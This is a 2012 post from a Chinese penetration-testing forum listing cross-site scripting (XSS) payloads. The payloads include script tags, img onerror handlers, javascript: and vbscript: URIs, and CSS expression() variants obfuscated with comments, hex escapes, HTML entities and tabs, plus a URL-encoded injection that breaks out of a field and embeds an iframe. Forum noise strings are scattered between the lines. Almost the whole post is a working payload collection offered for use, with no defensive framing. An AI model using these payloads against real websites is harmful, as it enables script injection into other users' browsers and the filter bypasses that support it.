中国网络渗透测试联盟
标题:
跨站语句大全
[打印本页]
作者:
admin
时间:
2012-9-13 17:15
标题:
跨站语句大全
<script>alert("跨站")</script> (最常用)
$ b' M# S8 e N; D
<img scr=javascript:alert("跨站")></img>
, h: k/ O1 v5 g: O: l* Q" _; t
<img scr="javascript: alert(/跨站/)></img>
# s0 [0 s0 c1 b3 e5 g. c
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
% s+ Q) A% Z' h3 R2 I
<img scr="#" onerror=alert(/跨站/)></img>
. z+ i- k4 \: O- U% X
<img scr="#" style="xss:expression(alert(/xss/));"></img>
0 X$ l% r# W7 p) s1 d6 m
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
$ b7 e* E& S+ V/ d* ~, z1 C* J
<img src=vbscript:msgbox ("xss")></img>
$ L2 i% @8 M, \: k% n5 q6 Z! p( ~
<style> input {left:expression (alert('xss'))}</style>
5 W( h( }; w3 b: J7 C, N( ?& x
<div style={left:expression (alert('xss'))}></div>
0 l! z! ~) C$ y$ M3 X6 z
<div style={left:exp/* */ression (alert('xss'))}></div>
7 o# z+ e* s) T3 b
<div style={left:\0065\0078ression (alert('xss'))}></div>
( O8 k6 N- b% c
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
g$ B3 j. d2 s4 P/ v5 L
unicode <div style="{left:expRessioN (alert('xss'))}">
0 ]+ Z- Z: k5 n5 b8 f- t
; D# M( v. z; g* k
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
' D1 J% K- J2 C9 |" Q
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2